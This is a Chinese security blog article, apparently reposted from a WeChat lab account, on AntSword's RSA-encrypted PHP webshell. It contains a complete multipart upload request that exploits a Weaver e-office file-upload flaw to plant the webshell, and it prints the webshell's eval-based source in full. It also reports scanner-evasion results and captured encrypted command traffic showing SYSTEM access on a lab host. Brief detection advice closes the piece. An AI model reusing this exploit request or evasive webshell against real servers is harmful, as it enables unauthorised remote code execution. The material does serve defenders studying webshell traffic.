中国蚁剑RSA非对称加密的攻与防

admin 2022年6月26日18:59:37安全文章评论28 views12461字阅读41分32秒阅读模式



网安引领时代,弥天点亮未来   





 

中国蚁剑RSA非对称加密的攻与防

0x00写在前面

本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!



中国蚁剑RSA非对称加密的攻与防

0x01中国蚁剑

中国蚁剑是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员,流量使用编码、解码器进行混淆可绕过WAF、IDS等检测系统,并且有多款实用插件灵活多样,为安全测试人员带来极大的便利,同时也受到很多人的青睐。

https://github.com/AntSwordProject/antSword


中国蚁剑RSA非对称加密的攻与防

0x02生成RSA木马

在线RSA生成网站

http://web.chacuo.net/netrsakeypair

生成公钥和私钥

中国蚁剑RSA非对称加密的攻与防

AntSword v2.1.0版本开始,新增了PHP RSA编码器,蚁剑内置了一个编码器RSA模块,使用了RSA非对称加密进行传输,新建编码器 -> RSA配置 -> 点击生成公私钥,然后配置公钥、私钥、PHP代码,生成中国蚁剑连接专用webshell

中国蚁剑RSA非对称加密的攻与防

编码器设置

中国蚁剑RSA非对称加密的攻与防

生成的webshell检测是否免杀

D盾检测(可检测)

中国蚁剑RSA非对称加密的攻与防

冰河webshell查杀(免杀)

中国蚁剑RSA非对称加密的攻与防

火绒检测(免杀)

中国蚁剑RSA非对称加密的攻与防


中国蚁剑RSA非对称加密的攻与防

0x03攻击测试

通过泛微e-office漏洞上传webshell

POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1Host: 10.211.55.9:8082User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36Accept-Encoding: gzip, deflateAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Connection: closeAccept-Language: zh-CN,zh-TW;q=0.9,zh;q=0.8,en-US;q=0.7,en;q=0.6Cookie: LOGIN_LANG=cn; PHPSESSID=0acfd0a2a7858aa1b4110eca1404d348Content-Length: 1289Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4
--e64bdf16c554bbc109cecef6451c26a4Content-Disposition: form-data; name="Filedata"; filename="test.php"Content-Type: image/jpeg
<?php$cmd = @$_POST['ant'];$pk = <<<EOF-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCjjg16ibX4sUv4fkHmijeD5M3G88Tp4ge9PWaYiUtXm23Tq3iEpZtpe6DkWbbLZvufHZWOQjv9sDEg5aCoeJOftRxvJOj+nqPb3oydsxOBzuoaquE6/ZcK4ZwYF4FipaOP0uctEc49uFQnBeneJLnrKx1eW0EArkolkjFKe8Y4DQIDAQAB-----END PUBLIC KEY-----EOF;$cmds = explode("|", $cmd);$pk = openssl_pkey_get_public($pk);$cmd = '';foreach ($cmds as $value) {if (openssl_public_decrypt(base64_decode($value), $de, $pk)) {$cmd .= $de;}}eval($cmd);--e64bdf16c554bbc109cecef6451c26a4--


中国蚁剑RSA非对称加密的攻与防


webshell连接地址

测试方式(编码器RSA+解码器default)

http://10.211.55.9:8082/images/logo/logo-eoffice.php


中国蚁剑RSA非对称加密的攻与防

测试连接成功


中国蚁剑RSA非对称加密的攻与防



配置http代理抓包分析连接流量

代理配置(也可以Wireshark抓包分析)


中国蚁剑RSA非对称加密的攻与防



第一个交互数据包

编码器RSA+解码器default


中国蚁剑RSA非对称加密的攻与防


中国蚁剑RSA非对称加密的攻与防


编码器RSA+解码器base64


中国蚁剑RSA非对称加密的攻与防


中国蚁剑RSA非对称加密的攻与防

编码器RSA+解码器rot13


中国蚁剑RSA非对称加密的攻与防


中国蚁剑RSA非对称加密的攻与防

对请求数据进行url解码、base64解码发现数据为乱码


中国蚁剑RSA非对称加密的攻与防

通过分析编码器,发现传输的数据是通过RSA公钥进行加密,baas64编码进行传输的,从而实现了对流量的免杀。


连接流量分析

1、Base64:

POST /images/logo/logo-eoffice.php HTTP/1.1Host: 10.211.55.9:8082User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194AContent-Length: 2810Accept-Encoding: gzip, deflateConnection: closeContent-Type: application/x-www-form-urlencodedant=YKc6gcTqiGacc%2FQ1PuCLeTUqaFsw2fOatVSzW0S1PsntU45VuBvI5msgplm%2FVJAD1o8bsswCt4UGXIw1epWyDPzFPgkAJilJr8OkwcI%2BWTV5m7n8AIhF0yOOPAocSH5iGI6m4oNt%2FQ7MBqCy1F0oT%2Fr4pBoH5OftueQi8dDLcuQ%3D%7CSupGNjon8my%2BNiArG6zK%2FcGQVH0nYrKqCyIjuWXexSpTNykDJ9kYxryrix1HOym%2FPewhjWj2LnQnwyp33mHGPRUoMb8IsXEQIgeeLOjV08LbkWb3dYzYDen3dMxLrMZz4r4rLsp4uenqc30g4X%2BQo4szxCdD1EveL%2F28FK5YJrY%3D%7CdhXaJmNV0FpVQrVFx6MsN5G%2Bxh9bdaSW5XGp%2FlP4wmB9oqAOFSbB66ONMkJjV6vBUzpLzkVxWu3CaqVwHobgHjCTpnqEtTzJ9PDLwznYDtiZeLwdeobxxJbS52L5kLFV4Q8Cs%2FGVJ3ZkmlZC0n5u0OL6Mz7oj5DpSJOxv76E3tY%3D%7CkmVlk8oig5gTjkdM0xwxLgWmICsSHgy52C4tOIHmQqW%2FJ7Th2k%2FalpjDcEXS5noQU4cGRum1zYYMyqb89feasu9FubYi872JIQWFTV1J90lwmRzesTnO1kbw%2BDDwYTZJFAqJv7oz5gzqCvtWayKwI5xC18DtJmaWGQ2pRB3h2js%3D%7CNHKMyZ5UX6GdF1aLhPgLlsx7cRILuWFgZ8LDzdFBAOjd3gsvlng0YDPYdPEgl6KEXQkOvDkRBq2vrRpDCCt2X7PjFxJxVhZQP%2FpjhEmcEp8lSJYNja6BTSSqRo3Z0TKa78rdeGwEJAAEg%2BLLKJearYOLalLqH12iaw%2BfcnY0XwI%3D%7CdAgPN66G8RP4J7KY935hmeMw12JG9QYNgLdxDwJ3JiMv4orLbq%2B5nOzH6VgXWgnUytZHtpaTf2FFr4KA3oZnSltLurBBvAXxuFiMcSr%2Bqg%2Fd1jDWI4mAsC8Z5Uz8TRBGmm1mcYNwE56u4ezW3Cjkf2nBmJmCkBUAOQQTvIW6zt0%3D%7CRbe5CDwSBZcic9Esr%2FeKg%2BJLii1A%2ByWJMGfaWrrp0%2BnXw4PYAGGT8IQHKzhdMF1GycKYPhKw4kV2szN%2FElP7rlP7gNMGxHhCGUOB%2FJlTwd4c2Z%2FHVfG4F0RLHfKqyIXii8UzRKvzicJVjk4tQV4VUuaaB%2BJqzRsfwJlh8ZxjJA0%3D%7CJ0GD%2F5W1bJCwfqWeJjRP7Crjfi5uwx%2FZh%2Bpq1pcbNtEtoqrc9J4tR27sWfVz9WY0oRVlZkajbUz9F%2B4nMe%2Fa5v%2FVEHYYjNRArOck9jrzQ9N9w%2F7qc%2FLtlR5Z%2BXgRAWw6HRI3SXQz7iI2Tr2yX%2Fc5uI7okY%2BrfwMClpXSuuHTEo8%3D%7CfohHb1C%2FzUJ77%2FIEAwmRISV%2BzsdeAygjtWPfb7XFDG3tfogdhGWxhyIm%2FgxwDbeW8%2B8qmGowryWHiGpSFc%2BdsflpoMVREYgreQAuuOKsccqVF%2B7O5hPj0wslH%2F8RXz99hu4M2RXxDGMKPi1Zjyt2xIeV0%2B0vVujqCoqj8JqaGnI%3D%7CDQBBTstRO9SvIktPWRtQPyD6qNX9Sb%2Fbyw4Err34XmvCo1pbYAqNdYzzngpKyx1ZnrH8fpHkhxEhkUiFiurfpqHiJQ6oVloYf90B%2FddykmZFkw4190%2B2rb0Hbw%2BSrduJEU7hWlKrMDqaG3Z8o8idVtbFXvihW4sM2qrKtXD5i1g%3D%7CMDHjjdGMDiHzsG94H340Z2VsjBceQ8YHaVx1SaslqoLMbTA9hov1EMTlYZm0Muy4jBin4i880UzrVBkxQBG%2F%2BeHP%2BToRLNilJZm6OJYMRdBTdSCR4qovem5W27HHaHUkZx%2BtcrvfKIA32GaFWymX3bGWHLBEe6z8xsFmqAhDjXQ%3D%7CNOGyWuBDmTeOBQmrAIdjUHR%2FfTXfW8eQSegmMwiDuOrNuETjirFOw6%2F1WwSev5CZ8jJKxMdc90o8rCXsqKl65wXzLyZuEcLWDVFb0Sdd06yr9W5D0Cec%2FyuYlxksHE9mzL%2F99uZsaCV4ETMIAHUl1IzoCwDKbNMWS6%2BuG0COlfs%3D%7CMgpQIzjmORFWFlnySqPz9TVXlg6LrZdZbWkdPDVx%2BU7zUzfcx3sAfPc7go90ketoIlFwqCa8xHf34Z7D0nPYV5n3c3GGO5IA0ASa%2Fark%2B9fPNYHQtx1H%2FjHmfrzJxnJY47BYXjkxlxx6qnszI%2FyVVDLgycd8VymeNZCRbsSF7ds%3D%7Cm7u0n8JL6%2BVeztHHYUwBwWCVuCb7V3xumKaLxKZpKqz7udyJxg36ZzCjnGu7hGmFbB2CFhl7LCk%2BCNRTniQM6AP0fXsYOYdQVLivY%2FeLSFN15dfUcjkgZGjMqejtIXdB2ovYqBIH%2FCsl1gjgwWLPX1jgLHwt23XvdZFhCEdqBik%3D%7CZS4P86VmcXviTY5mBBYs4HfEhMLBypZQ%2Fnh9aPkgiDonbEMAshMh%2BhHLVxPQhKvBoodun9SkOSnVKLKdcbR%2BEFdlRkEpEC42SVxQqFKV2fPaRlYDA8%2BeXsH07WE9MLg3laVgHFLI2BUs9r1yLMH6Cqsy79FJvacW%2FBDKX9Ql1uM%3DHTTP/1.1 200 OKDate: Tue, 12 Apr 2022 08:41:37 GMTServer: Apache/2.0.47 (Win32) PHP/5.2.5X-Powered-By: PHP/5.2.5Content-Length: 118Connection: closeContent-Type: text/html; charset=utf-8721d11efQzovZW9mZmljZS93ZWJyb290L2ltYWdlcy9sb2dvCUM6RDoJV2luZG93cyBOVCBZVU5aVUktUEMgNi4xIGJ1aWxkIDc2MDEJU1lTVEVNffc472

2、chr

POST /images/logo/logo-eoffice.php HTTP/1.1Host: 10.211.55.9:8082User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36Content-Length: 2840Accept-Encoding: gzip, deflateConnection: closeContent-Type: application/x-www-form-urlencodedant=YiXyFq%2Fprrg4evrbbiKnLPUMXcUjdDNePMJiFvnkuQsNf%2F2bDDbV%2BglxW6TWK%2F%2F%2F45rsR%2BY%2Fm8iLhcUt0IshzxbHC7bOLa7eKLCcuSOVLtJnAbQhG7oVEc76uBlsdCU5Wu7mPLWBYTHhhRNPwtvdlOIQbdFaxto3o17MWy9L3yw%3D%7Cc4NlNm5agVTJHbfPp%2FW2a3I1hd%2BBudSZyVUQcZAqNHsCIoPUqoxXX5p5AA1doeA2zCtn%2Feg8p3TB4UAPJbzSW%2B7Te2x62oNkRdDh%2FVr6ZlEbAG5pZC%2B0cI8GL48drvdjVECuDj74gEll9BCRW6GFpxnZXFfpMECOO3r6ZllbEnk%3D%7CLW5%2FbREDZoax%2FDbAk7ZJr%2FTPM9kfxuTZI%2F0amfCcwRAsUnuYCZ77xYtZHQTSIfXn3zw85Cr5slp5SQkReurmsAE4pIpc4IaJDQstl3zuT%2B6bH9FJa%2FSaSxMTmrUAg7k59J3z%2BkGzYwcOlp1%2BObtBHkQVZQ9xEuW2yr1QTHD%2FfJ0%3D%7Cnmv4HxDpKTfWcvCqOORZ0ccm%2FhpNNQ7XJGJPMdKx3G2xojU7C%2BKaOEBqVPPMrYJRRdVPWApUj2fSAPEeCQi87TeFm78adpzbtZmrYta7TQYFROF3UFv0hMgBvQw6ONutQntgE0GaCFRVqVC6b6ZqkUJUvHM8B8Zu9FKPzngUwlU%3D%7ChrQwyxH9%2FJx6LFT0VNv0cSd%2Ff2yzVw%2BOJiclxUKcEhV8q%2FM1Tx0Zx%2FNizuGpB%2FmmNBfzeMffSZkMxeWEtEYQK%2F4in1rK4T3RF1nZ06cneuI45rD1959C2mLSjVul0AKaFvZSTW0vL5laM4rYl1BHBhWblgVcbUWi5B6dRnk%2BjCE%3D%7CnevocVhkYRoAcVraHcND49w%2FGgpYxQM4jc1n8J%2FHrEfjNnbJmCKabgsFUb2TGmv5i0n%2FfLzTSQ%2FBo1kBztiWU4pTSBJ3iv2UBhPMG9LEB9xH%2FbkQWIa2ePIr56YWmvfN6fXy1F6lW7T7%2F4FIE%2F4DDb4jgwUncWFA504ogCNLW7E%3D%7Cdl1Wo3bpS5Elt0Q2bonJZmPJAioe3g3s%2Fx%2FfK%2F8UtCXzUhhY3kxKJb9itP%2BbPbrrbUY6lAdl13G0BE%2F2SdtFiD0Kx9b4RN30r6l8jsuJla7uc01LX%2BHjBcojGdIYr23P%2FSzZBHVffNCSljfTJbYlDO5sPJ%2FgmoBtJOLEoP0Hi70%3D%7CBTj0kRvK6GPmDn0uEm%2Fm8F3%2BsxItr1h4hR3zdVa1VF%2B%2FNXUqS3uBETvN9qPLWhGUBZfMdL1j3Vjv7vMqNQBZuxqZ2Z0irD1AWzjQrI5gaZOi0mICY67eJKWeY95udeharJ5tPVaQv9Id1jeLEKk1H2r0acEpUGpCJWtCPX%2BIWBI%3D%7CiwHLtTeNpssZ%2BLjVBEBZuNzpFkPFSRlhhzLu29D7aT%2FHRz%2BBtgT8sZuPTGJnEC6QXo0hhEzHLtZ%2BVnvGqGPGt0pNi3eGBy%2FLdAdXtigPepjtLv0EAETm%2FmJvGfgrPhM0yRAQz9AGky%2BltYhoU4uVPsWBUDR7owEZKotewpiym7k%3D%7CVLoJK05GULezBTpPlin%2FUuWZnZXg%2BFkzCUqB5eAvjiUYb6SMZPUvnI9L1KBQcJnpaT81t5O3GRufjybWYv8Y359IgxluNh6WajnkcFWXZnTAowH%2FOH8Was%2BQ9C3XCOX7kkJQEbWS7ifS%2BZJ76sfnDScEblc5iaD4jLn43isa9vE%3D%7CbPwMmWNCNQbhqma%2FLEtS18P9eLlPU4tOt3BBQb%2FwGriS9Qo%2FvDCgsb6FDkVpr27U807dvKa7ybpReM1%2FWuXVpTIFs6UeV9Tt0U6o8Edr5c5cOyYHY%2BHk0Q6%2FY8hxaWxi8GSXqlLBU3tXk817APkZq55Gdgzvha%2F6xR24K5LUW68%3D%7CTa8OgzCIJ8M39TVsfYIjfCqfgnbJU2eEFCHE1QcxeCCj78khr2hl3971WnDpiFRcvqGrHJJg2nb%2FfWf%2BhGVRuixitEktqdDf612Jg%2BZyYe40TZI%2F4AUpGjX17TNdVAjNRW4U8vL89p3%2BYwcLQyjCUgSsEsiSfOoqJOQOZcRpv4I%3D%7CA8vIoVGO2xL1mrc9GyqXBfrflBO6fsYMoZuyqYQLtdOaLxPbQlcXAPThxjizMdKeKTV0Vz8Ia9x7a6Kdz%2F928YeE6OqyNlord1aCy%2BHKRYlPnn7waenQnhkNke283xdnK5rcH7u5YmAgbcAqttNmI13jNMeTcgDIIvF7hBXsz14%3D%7CHmDv190rZS9yiVLSTLvquni0hNxuGPM%2BjUgko3n4yy2NyrYd38qmD6fXdMwE%2B2sqx9ihwnLSVRF%2FjJ8y%2B2w0JjHpzHwqtNXgAXEppAAKHrFLPvFIU%2BJ8LaqnZu%2FAZKp%2Bucb2KbpNkeOx8bjH5yk0v7qc%2BsKvvvjifHtNaIOd0us%3D%7CMnW67HYNEpuFHTxLbP3pR4AsckEbsGB03bS2fYGndibUuILPvqdsdbuU6rdrKTAZluKY%2BeFstXEgLKPK%2F4rWhPou%2FsyO%2ForB%2BnwbaKRmsSHaIdb6rH6GrmWg5wUzoliKi5iiUb4tk5wyE46MsRGmaAweg1bpCvUWlCF6GKc8ekA%3DHTTP/1.1 200 OKDate: Tue, 12 Apr 2022 08:41:40 GMTServer: Apache/2.0.47 (Win32) PHP/5.2.5X-Powered-By: PHP/5.2.5Content-Length: 91Connection: closeContent-Type: text/html; charset=utf-84629930P:/rbssvpr/jroebbg/vzntrf/ybtb     P:Q:     Jvaqbjf AG LHAMHV-CP 6.1 ohvyq 7601     FLFGRZa9b886


3、default

POST /images/logo/logo-eoffice.php HTTP/1.1Host: 10.211.55.9:8082User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36Content-Length: 2828Accept-Encoding: gzip, deflateConnection: closeContent-Type: application/x-www-form-urlencodedant=YiXyFq%2Fprrg4evrbbiKnLPUMXcUjdDNePMJiFvnkuQsNf%2F2bDDbV%2BglxW6TWK%2F%2F%2F45rsR%2BY%2Fm8iLhcUt0IshzxbHC7bOLa7eKLCcuSOVLtJnAbQhG7oVEc76uBlsdCU5Wu7mPLWBYTHhhRNPwtvdlOIQbdFaxto3o17MWy9L3yw%3D%7Cc4NlNm5agVTJHbfPp%2FW2a3I1hd%2BBudSZyVUQcZAqNHsCIoPUqoxXX5p5AA1doeA2zCtn%2Feg8p3TB4UAPJbzSW%2B7Te2x62oNkRdDh%2FVr6ZlEbAG5pZC%2B0cI8GL48drvdjVECuDj74gEll9BCRW6GFpxnZXFfpMECOO3r6ZllbEnk%3D%7CLW5%2FbREDZoax%2FDbAk7ZJr%2FTPM9kfxuTZI%2F0amfCcwRAsUnuYCZ77xYtZHQTSIfXn3zw85Cr5slp5SQkReurmsAE4pIpc4IaJDQstl3zuT%2B6bH9FJa%2FSaSxMTmrUAg7k59J3z%2BkGzYwcOlp1%2BObtBHkQVZQ9xEuW2yr1QTHD%2FfJ0%3D%7Cbrg6%2BKZM7B3qYLLGppGHJ1q7yCTBr3Z6pGLX0LL87I2pQD%2BzHLt1amHKmgeQ0cEA2Y9Wp3ae11u9%2FFGcxL3YScRGu8r043fdD%2BqbSOivWbbVPbUfVv1rLCtNXyqXudWxlGJ9ACID%2Fa0ibhzyaMv9v11IupPPHXiMlPL6rw7P05k%3D%7CTyo5lbtjtq5GT3KcoNqbuL4b%2Fm4paol7bahEj%2Bas5GzKu%2BQu3M1Vm3TpSnPiTfE9xRtlvPFj8nnNnPJ%2FW1HFuDMxYw4hpcSWSQq%2FyrSEfAG1oMHDHsOj5VZE6OkHnkR%2BJv9MBDHBCrPPfLkMODATBPT2gN%2BMVNgiyIkQWmHeaSI%3D%7CekPxfn%2FJQweaqz9RdL2Xx7AyBznz3eNqY2KWCnFX3fuR2McHrvrtl2MVXgKogqQrhfFa96Ee%2B1EaJYwzk%2FcxUV0%2FzUE5YWbQFZQuH3znmR0Jd33aVZrvhDMtD23xsLw6BhaMOtQ8k8Ieoi5lt7GjDIiAAThFsSXnSXL%2Fydy15YI%3D%7Ci6C2yHJJ%2BENE%2BYAb%2F1DarE4I3Vvnz2MvVeI%2B4PH6xNKEkGNWL1dxuit7OBprlU4zF7H4r4TMTGP9dsl6eSEOL14W%2Fh888UKTVQb6h5wafxkekR6SNqMvWGdQ010UNgqZ%2BD4h5zJgFEsJc293y8ORS%2FNUpcOzqWuL2DE91SbvhPI%3D%7CAJNFE62mMKRdrNqeZQwIzsrKmnZir%2FC3nh2LF4zHhpLml%2BrEROR6pxq8VoxEyOJ4HqBokufQaXcTbliLpqdKBLXawRMoFLxB%2FcUEgnPH6QnTcGp2o4dIQyNzkC6imdYaKsTGHMMMzpcbnk1Mm2bmJu%2FH9KdAJ2RFHoWqwQm1Ox8%3D%7CRWtP1JCbFMwbB7AJkUoSoostVOcASOo65xFis3HlwhJEWPgeRFMZ7J%2Fxlalobf26%2BGn3KqG69Wou%2BkMEyULuE6UqWzVBCTvU7ZNxybEApDKkD4AJRukbdhm47MpdiGblkHrqZUvMP4Q6XrJ78a93F1qZpzulGbEBKEC2dvaudEs%3D%7Cj%2FOjvw1xVxaA4jBBbpKI%2FW1TqccJnkSa3KunBHn3Kr8lYMGS8bUSlN1HryluZQcdjn6%2B44JKhYmTqXsgmyxGCjAehNgZ1RhPDJSAx9%2FJrMbxTmXWNQjMiYIgISIHIMmwrgc4HflRmzx3XG3ArVCJbKPb1EbgJ6kFVRJKSrmvYuw%3D%7CUV%2BfJc43%2FEH02EQDYkQ%2BU8rx6CKtkkQcKLJufm%2B7zKxUjuwEeYI9pKCDXfxQCw3pgakeH3qxBMLA5iJBtp1kQgMXwqrjRxOmq37vqdEXE7NRbDXzSReD4I9Rn860ACvhqEuIHmxSuTR7QlDcmd%2Bhu2Q5jR0yMIlwEEkyIkAIef0%3D%7CeDVGOZ%2FbXT7Yt0bddjGpbAW6WCwd3f0szgeT0zLQH%2BGaRpTaHR1qzgKlJ1HdQAWLZKlTkeghqtgvTSWJdmPZXkCLVnuf3pDcWlkNWLAiIAWJGcjRu5WyZyyDQBUQuI%2FHinSIs01P2RygKyGxMdG6QfKCgEZzjw7e3f%2FkMR%2Bu4YQ%3D%7CZDF%2FGyXt35XIuWB9U9U6aIzYU3g2yIsmmAlHeWF8E5yjwKCE5Zt7fpzoh1ouDK%2B21lRIVz9QFjQHTq8EZw%2FVfLiONMC9Jq1Ju%2FTH%2F1Suwlyf%2Bwa914vs1Z0r%2Bh8udvkU%2FkweuaVoNGmp30VlU%2FW9XC%2B93DN%2F67FE%2BidxUXA5O%2B4%3D%7Cg4f7XkR0Mf8PqCpKoVekbCAKw582AiYfHhpLGo3XASJ9SEMzub5FuOrw7cd7UVUXXQHqkayiHyUh2kq%2BV7WiLtei9Sq92fp9xVWN32J8voiGsfEnBm1lPcwZbmFSa0vhzdrVmxphOarJg2wFrpYlcpY58GmlFNCwCnam52J1q9Q%3D%7CH8oR66x2cJmVBtkyuAYeFyrsqPcSSRSXCymHKK2Tbt%2FquUXV1uFmewppEt%2Fw2UDb7ARQNXXOEhCAYAyzlZaYSvWBUwejUoLIR5wzwjAzVZpIxe8xZQSfnrEjNd7aM6Fp%2FYJgwa7wSpcKeIQ%2BkUslFpEv53StQycn6hV9pJl4WXc%3DHTTP/1.1 200 OKDate: Tue, 12 Apr 2022 08:41:34 GMTServer: Apache/2.0.47 (Win32) PHP/5.2.5X-Powered-By: PHP/5.2.5Content-Length: 92Connection: closeContent-Type: text/html; charset=utf-8a96ed3a93C:/eoffice/webroot/images/logo     C:D:     Windows NT YUNZUI-PC 6.1 build 7601     SYSTEM690a7







中国蚁剑RSA非对称加密的攻与防

0x04检测建议

中国蚁剑工具从设计和使用角度加入了很多攻防对抗的思考。以下为三点检测建议:

第一,从从攻击入口检测RSA木马的上传,可以使用静态检测规则或者沙箱或webshell查杀引擎进行。(流量、行为等)

第二,检测中国蚁剑工具在流量测的强特征,具体可以从上述分析中研究提取。

第三,通过威胁狩猎进行全方位监控,发现异常进行全流量回溯,从而定位攻击。




中国蚁剑RSA非对称加密的攻与防 

知识分享完了

喜欢别忘了关注我们哦~


学海浩茫,

予以风动,
必降弥天之润!


   弥  天

安全实验室

中国蚁剑RSA非对称加密的攻与防

原文始发于微信公众号(弥天安全实验室):中国蚁剑RSA非对称加密的攻与防

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年6月26日18:59:37
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  中国蚁剑RSA非对称加密的攻与防 http://cn-sec.com/archives/1145385.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: